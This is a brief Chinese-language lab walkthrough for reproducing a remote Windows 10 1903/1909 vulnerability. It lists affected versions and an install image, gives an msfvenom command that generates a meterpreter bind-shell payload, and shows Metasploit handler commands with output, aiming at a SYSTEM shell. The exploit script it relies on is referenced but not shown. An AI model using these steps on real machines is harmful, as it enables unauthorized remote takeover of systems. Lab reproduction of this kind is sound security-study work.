簡單來說,適合內網滲透,除非有人把win10放在了公網上。
危害:拿到shell和系統權限。
利用難度:簡單。
1、受影響的系統版本
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
復現的話,推薦用這個鏡像。
ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/
進去之後把windows防護牆關掉。
2、復現
msfvenom -p windows/x64/meterpreter/bind_tcp lport=1234 -f py -o evil.py
生成evil.py,把buf變量改成USER_PAYLOAD,同時,將每行前面加入b,代表byte,後面腳本沒有這個會報錯。
然後將啓動msf,進行監聽。
msf > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > set rhost 172.16.230.165
rhost => 172.16.230.165
msf5 exploit(multi/handler) > exploit
運行腳本,使用python3。
執行完畢之後,靶機電腦會要求重啓。
然後我們這邊就會獲得一個帶有系統權限的shell。
3、總結
沒啥總結的,動起手來是王道。
腳本在這。